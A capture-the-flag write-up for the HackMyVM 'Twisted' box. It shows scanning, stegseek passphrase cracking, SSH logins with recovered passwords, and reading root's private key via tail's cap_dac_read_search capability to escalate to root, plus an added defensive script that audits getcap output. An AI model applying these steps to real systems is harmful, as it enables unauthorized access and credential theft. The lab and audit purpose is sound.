Target machine: https://hackmyvm.eu/machines/machine.php?vm=Twisted
Author: sml
Difficulty: ⭐️⭐️
Key points: privilege escalation via Linux file capabilities, cracking steganographic images with stegseek
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.13 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 16:02 CST
Nmap scan report for 192.168.9.13
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:4A:6C:9F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.20 seconds
Take a look at the website.
Save the two images locally.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.9.13/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.13/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
Nothing found.
I have not done much misc work, and tried several approaches without solving it. After looking at a writeup, stegseek can brute-force it.
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# stegseek --seed cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found (possible) seed: "841e4403"
Plain size: 47.0 Byte(s) (compressed)
Encryption Algorithm: rijndael-128
Encryption Mode: cbc
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# stegseek --crack cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# stegseek --crack cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# cat cat-hidden.jpg.out
thisismypassword
┌──(root㉿kali)-[/home/kali/hmv/Twisted]
└─# cat cat-original.jpg.out
markuslovesbonita
So markuslovesbonita is his password?
The original filenames are probably the usernames: markus and mateo.
After testing, I obtained two users with their corresponding passwords:
markus markuslovesbonita
mateo thisismypassword
The SSH port is 2222.
markus@twisted:~$ find / -perm -4000 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
markus@twisted:~$ sudo -l
-bash: sudo: command not found
markus@twisted:~$ cd /home/bonita/
markus@twisted:/home/bonita$ ./beroot
-bash: ./beroot: Permission denied
Looks like we need to get the bonita user first.
Let's look at the hint given to markus.
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
This tells us bonita's private key is stored there.
markus@twisted:/var/cache/apt$ ls -l
total 62172
drwxr-xr-x 3 root root 12288 Oct 14 2020 archives
-rw------- 1 root root 1823 Oct 14 2020 id_rsa
-rw-r--r-- 1 root root 31831069 Oct 14 2020 pkgcache.bin
-rw-r--r-- 1 root root 31810419 Oct 14 2020 srcpkgcache.bin
But we don't have permission to read this private key (mode 0600, owned by root).
mateo's hint:
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav
Listening to the audio, it sounds like Morse code:
G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .
Doesn't seem to mean anything.
I already checked the common privilege-escalation paths, SUID and sudo.
Let's check file capabilities next.
mateo@twisted:/var/www/html$ /sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
tail has cap_dac_read_search, which bypasses file read permission checks, so we can use it to read the private key:
tail -c1G "/var/cache/apt/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
[key contents omitted]
-----END OPENSSH PRIVATE KEY-----
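The finding above is exactly what a host audit should catch: a binary with an effective capability that bypasses DAC. The following is an added example (not from the original writeup) that parses `getcap -r /` output and flags such capabilities; the sample output is constructed from the two lines on this box plus one line in the newer libcap (2.41+) `path cap=flags` format, which it also handles.

```python
import re

# Capabilities that let a binary bypass DAC or escalate outright.
# cap_dac_read_search is the one abused on this box (tail reading root's id_rsa).
RISKY_CAPS = {
    "cap_dac_read_search": "read any file regardless of permissions",
    "cap_dac_override": "read/write/execute any file regardless of permissions",
    "cap_setuid": "change UID (can become root)",
    "cap_setgid": "change GID",
    "cap_sys_admin": "broad admin rights (mounts, namespaces)",
    "cap_sys_ptrace": "attach to other processes",
    "cap_chown": "change file ownership",
    "cap_fowner": "bypass file owner checks",
    "cap_sys_module": "load kernel modules",
}

# Old libcap format: "/path = cap_a,cap_b+ep"; newer libcap (>=2.41): "/path cap_a,cap_b=ep".
# Paths containing spaces are not handled (single-clause entries only).
_OLD = re.compile(r"^(?P<path>\S+) = (?P<caps>[^+=]+)\+(?P<flags>[eip]+)$")
_NEW = re.compile(r"^(?P<path>\S+) (?P<caps>[^+=]+)=(?P<flags>[eip]+)$")

def parse_getcap_line(line):
    """Return (path, [caps], flags) or None if the line is not a getcap entry."""
    line = line.strip()
    m = _OLD.match(line) or _NEW.match(line)
    if not m:
        return None
    caps = [c.strip() for c in m.group("caps").split(",")]
    return m.group("path"), caps, m.group("flags")

def audit_getcap(output):
    """Flag binaries whose risky capabilities are in the effective set ('e')."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps, flags = parsed
        for cap in caps:
            if cap in RISKY_CAPS and "e" in flags:
                findings.append((path, cap, RISKY_CAPS[cap]))
    return findings

# Constructed sample: the two entries from the box plus one in the newer format.
SAMPLE = """/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
/usr/bin/python3.11 cap_setuid=ep
"""

if __name__ == "__main__":
    for path, cap, why in audit_getcap(SAMPLE):
        print(f"[!] {path}: {cap} ({why})")
```

Run it against real output with `getcap -r / 2>/dev/null | python3 audit.py` after swapping `SAMPLE` for `sys.stdin.read()`; ping's cap_net_raw is expected and is not flagged.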
Use the private key to switch to the bonita user:
ssh -i id_rsa bonita@192.168.9.13 -p 2222
bonita@twisted:~$ cat user.txt
HMVblackcat
Run beroot in bonita's home directory.
It prompts us for a password.
I remembered there were still two unused results from the earlier stegseek run:
sexymama
westlife
Tried both; both were wrong.
Let's reverse the executable and take a look.
The code should be 5880.
Successfully escalated to root.
bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~#